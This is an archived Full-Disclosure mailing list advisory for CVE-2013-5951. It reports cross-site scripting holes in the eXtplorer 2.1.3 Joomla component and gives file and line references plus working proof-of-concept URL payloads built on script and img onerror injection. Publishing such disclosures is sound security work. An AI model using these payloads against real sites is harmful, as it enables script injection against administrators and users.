lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1394883332.14875.YahooMailNeo@web125003.mail.ne1.yahoo.com>
Date: Sat, 15 Mar 2014 04:35:32 -0700 (PDT)
From: Mahmoud Ghorbanzadeh <mdgh9@...oo.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: [CVE-2013-5951] Multiple Cross Site Scripting
	Vulnerabilities in eXtplorer 2.1.3

Hello,

Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string inthe URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.

File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component

File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin


File: /include/copy_move.php 
Line: 158 
POC:
http://site/administrator/index.php/<img src=x
onerror=alert('XSS')
>?option=com_extplorer&tmpl=component&action=post&do_action=copy

File:  /include/functions.php 
Line: 933 
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component

File: /include/header.php
Line: 73
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component

File: /include/upload.php
Lines: 191 and 259
POC:
http://site/administrator/index.php/<img src=x:alert(alt)
onerror=eval(src)
alt=XSS>?option=com_extplorer&tmpl=component&action=upload

Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.


Best Regards.

Content of type "text/html" skipped

Download attachment "Extplorer XSS Vulnerabilities Report.docx" of type "application/vnd.openxmlformats-officedocument.wordprocessingml.document" (80554 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ